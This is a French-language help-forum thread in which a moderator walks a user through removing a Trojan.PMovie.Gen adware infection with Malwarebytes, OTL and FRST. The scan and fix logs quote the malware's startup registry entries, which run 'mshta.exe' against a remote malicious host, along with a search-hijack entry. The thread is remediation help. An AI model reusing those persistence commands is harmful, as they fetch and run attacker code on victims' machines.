Trojan.PMovie.Gen

Résolu/Fermé
Sharamande Messages postés 14 Date d'inscription vendredi 4 avril 2014 Statut Membre Dernière intervention 23 septembre 2016 - 4 avril 2014 à 12:39
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 4 avril 2014 à 15:05
Bonjour,

J'ai cherché un post pour supprimer Trojan.PMovie.Gen mais je n'ai pas trouvé (sauf erreur).

Il y a une fenêtre de site porno japonais qui apparait sur l'ordinateur. Lorsque j'utilise Malwarebytes je trouve le Trojan.Pmovie.Gen à supprimer. Je supprime mais au redémarrage et avec un nouveau scan il réapparait. J'ai refais l'analyse en mode sans échec mais ça ne change rien. Je ne sais plus quoi faire. Quelqu'un aurait-il une idée ?? Merci.

11 réponses

Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660
4 avril 2014 à 12:45
Salut,

Donne le rapport Malwarebytes.
0
Sharamande Messages postés 14 Date d'inscription vendredi 4 avril 2014 Statut Membre Dernière intervention 23 septembre 2016
4 avril 2014 à 13:04
Voici le rapport :

alwarebytes Anti-Malware 1.75.0.1300
www.malwarebytes.org

Version de la base de données: v2014.04.04.02

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 11.0.9600.16428
Antonin :: ANTONIN-PC [administrateur]

04/04/2014 12:58:35
MBAM-log-2014-04-04 (13-02-23).txt

Type d'examen: Examen rapide
Options d'examen activées: Mémoire | Démarrage | Registre | Système de fichiers | Heuristique/Extra | Heuristique/Shuriken | PUP | PUM
Options d'examen désactivées: P2P
Elément(s) analysé(s): 218587
Temps écoulé: 3 minute(s), 34 seconde(s)

Processus mémoire détecté(s): 0
(Aucun élément nuisible détecté)

Module(s) mémoire détecté(s): 0
(Aucun élément nuisible détecté)

Clé(s) du Registre détectée(s): 0
(Aucun élément nuisible détecté)

Valeur(s) du Registre détectée(s): 1
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|SystemBootnU5HemVDszxyLtzDczEQSTn69pm97IzE (Trojan.PMovie.Gen) -> Données: mshta.exe http://hnx.pidoajse.net/reg2.php?cccid=nU5HemVDszxyLtzDczEQSTn69pm97IzE&log=1 -> Aucune action effectuée.

Elément(s) de données du Registre détecté(s): 0
(Aucun élément nuisible détecté)

Dossier(s) détecté(s): 0
(Aucun élément nuisible détecté)

Fichier(s) détecté(s): 0
(Aucun élément nuisible détecté)

(fin)
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660
4 avril 2014 à 13:06
Faire un Scan OTL - Temps : Environ 40min
=====================
OTL permet de diagnostiquer les programmes qui tournent et déceler des infections - Le programme va générer deux rapports OTL.txt et Extras.txt
Fournir les deux rapports :

Tu peux suivre les indications de cette page pour t'aider : https://www.malekal.com/tutorial-otl/

* Télécharge http://www.geekstogo.com/forum/files/file/398-otl-oldtimers-list-it/ sur ton bureau.
(Sous Vista/Win7, il faut cliquer droit sur OTL et choisir Exécuter en tant qu'administrateur)

Dans le cas d'Avast!, ne pas lancer le programme dans la Sandbox (voir lien d'aide ci-dessus).

* Lance OTL
* En haut à droite de Analyse rapide, coche "tous les utilisateurs"
* Sur OTL, sous Personnalisation, copie-colle le script ci-dessous :



netsvcs
msconfig
safebootminimal
safebootnetwork
activex
drivers32
%ALLUSERSPROFILE%\Application Data\*.
%ALLUSERSPROFILE%\Application Data\*.exe /s
%ALLUSERSPROFILE%\Application Data\*.dll /s
%APPDATA%\*.
%APPDATA%\*.exe /s
%temp%\*.exe /s
%SYSTEMDRIVE%\*.exe
%systemroot%\*. /mp /s
%systemroot%\system32\consrv.dll
%systemroot%\system32\*.dll /lockedfiles
%windir%\Tasks\*.job /lockedfiles
%systemroot%\system32\drivers\*.sys /lockedfiles
%systemroot%\System32\config\*.sav
/md5start
explorer.exe
winlogon.exe
services.exe
wininit.exe
/md5stop
HKEY_CLASSES_ROOT\CLSID\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InprocServer32 /s
HKEY_LOCAL_MACHINE\SYSTEM\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /s
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems /s
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls /s
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList /s
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor /s
HKEY_CURRENT_USER\Software\Microsoft\Command Processor /s
CREATERESTOREPOINT
nslookup https://www.google.fr/?gws_rd=ssl /c
SAVEMBR:0
hklm\software\clients\startmenuinternet|command /rs
hklm\software\clients\startmenuinternet|command /64 /rs



* Clique sur le bouton Analyse.

**** Si durant le scan - OTL ne répond pas, ne touche à rien et laisse le scan se poursuivre ****

* Quand le scan est fini, utilise le site http://pjjoint.malekal.com/ pour envoyer le rapport OTL.txt (et Extra.txt si présent).
Donne le ou les liens pjjoint qui pointent vers ces rapports ici dans une réponse.
Je répète : donne le lien du rapport pjjoint ici en réponse.

NE PAS COPIER/COLLER LE RAPPORT ICI - DONNER LE LIEN PJJOINT DANS UN NOUVEAU MESSAGE

0
Sharamande Messages postés 14 Date d'inscription vendredi 4 avril 2014 Statut Membre Dernière intervention 23 septembre 2016
4 avril 2014 à 13:18
D'accord. Merci pour la rapidité. Je fais tout ça dès que possible.
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
Sharamande Messages postés 14 Date d'inscription vendredi 4 avril 2014 Statut Membre Dernière intervention 23 septembre 2016
4 avril 2014 à 13:42
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660
4 avril 2014 à 13:50
Le rapport est correct.
Peut-être une tâche planifiée.

Si la page se remet au démarrage, fais ça :

Suis ce tutorial : https://www.malekal.com/tutoriel-farbar-recovery-scan-tool-frst/
Cela va générer deux rapports FRST.
Envoie comme expliqué, ces deux rapports sur le site pjjoint et donne les deux liens pjjoint de ces rapports afin qu'ils puissent être consultés.


0
Sharamande Messages postés 14 Date d'inscription vendredi 4 avril 2014 Statut Membre Dernière intervention 23 septembre 2016
4 avril 2014 à 14:11
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660
4 avril 2014 à 14:22
A part les clefs Run pour ouvrir les pages, y a rien d'anormal.


Ouvre le bloc-notes : Menu Démarrer / Tous les programmes / Accessoires et Bloc-Notes.
Copie/colle dedans ce qui suit :


HKLM-x32\...\Run: [RegWritenU5HemVDszxyLtzDczEQSTn69pm97IzE] - mshta.exe http://hnx.pidoajse.net/set_inf2.php?cccid=nU5HemVDszxyLtzDczEQSTn69pm97IzE <b>[Pays AU - 157.250.79.4]</b>
HKLM-x32\...\Runonce: [RegWritenU5HemVDszxyLtzDczEQSTn69pm97IzE] - mshta.exe http://hnx.pidoajse.net/set_inf2.php?cccid=nU5HemVDszxyLtzDczEQSTn69pm97IzE [X] <b>[Pays AU - 157.250.79.4]</b>
SearchScopes: HKLM - DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM - {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL =
SearchScopes: HKCU - {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = http://search.conduit.com/?gd=&ctid=CT3319415&octid=EB_ORIGINAL_CTID&ISID=M1AB8C4C9-528D-49C2-8E7A-C0FB35C7C378&SearchSource=58&CUI=&UM=5&UP=SP56DBC13E-1806-4993-9EEE-BA9BF92C6136&q={searchTerms}&SSPV= <b>[Pays NL - 195.78.120.88]</b>


Menu Fichier / Enregistrer-sous
Place toi sur le bureau.
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clic sur Enregistrer - cela va créer un fichier fixlist.txt sur le bureau.

Relance FRST et clic sur le bouton fixlist.txt
Selon comment un redémarrage est nécessaire (pas obligatoire).
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.


Redémarre l'ordinateur

0
En fait j'avais téléchargé FSRT dans le dossier téléchargement. J'ai mis le fichier listfix.txt dedans, ouvert FRST et cliquer sur fix.

Voici le fichier texte :

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 13-03-2014
Ran by Antonin at 2014-04-04 14:34:31 Run:1
Running from C:\Users\Antonin\Downloads
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
HKLM-x32\...\Run: [RegWritenU5HemVDszxyLtzDczEQSTn69pm97IzE] - mshta.exe http://hnx.pidoajse.net/set_inf2.php?cccid=nU5HemVDszxyLtzDczEQSTn69pm97IzE <b>[Pays AU - 157.250.79.4]</b>

HKLM-x32\...\Runonce: [RegWritenU5HemVDszxyLtzDczEQSTn69pm97IzE] - mshta.exe http://hnx.pidoajse.net/set_inf2.php?cccid=nU5HemVDszxyLtzDczEQSTn69pm97IzE [X] <b>[Pays AU - 157.250.79.4]</b>

SearchScopes: HKLM - DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =

SearchScopes: HKLM - {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL =

SearchScopes: HKCU - {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = http://search.conduit.com/Results.aspx?gd=&ctid=CT3319415&octid=EB_ORIGINAL_CTID&ISID=M1AB8C4C9-528D-49C2-8E7A-C0FB35C7C378&SearchSource=58&CUI=&UM=5&UP=SP56DBC13E-1806-4993-9EEE-BA9BF92C6136&q={searchTerms}&SSPV= <b>[Pays NL - 195.78.120.88]</b>

*****************

HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\RegWritenU5HemVDszxyLtzDczEQSTn69pm97IzE => Value deleted successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\RegWritenU5HemVDszxyLtzDczEQSTn69pm97IzE => Value deleted successfully.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Value was restored successfully.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} => Key deleted successfully.
HKCR\CLSID\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} => Key not found.
HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} => Key deleted successfully.
HKCR\CLSID\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} => Key not found.

==== End of Fixlog ====

J'ai redémarré l'ordinateur. J'ai relancé Malwarebyte. Il n'a plus rien détecté. J'ai l'impression que cela a marché. Je relance une dernière fois l'ordi et je vous tiens au courant.
0
Voilà j'ai encore redémarré l'ordi et plus rien d'inopportun. J'attends que vous lisiez le dernier fichier texte pour être sûr.

Merci pour votre talent, votre clarté et votre rapidité !
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660
Modifié par Malekal_morte- le 4/04/2014 à 15:05
ok c'est cool :)

Je passe le sujet en résolu!

Like the angel you are, you laugh creating a lightness in my chest,
Your eyes they penetrate me,
(Your answer's always 'maybe')
That's when I got up and left
0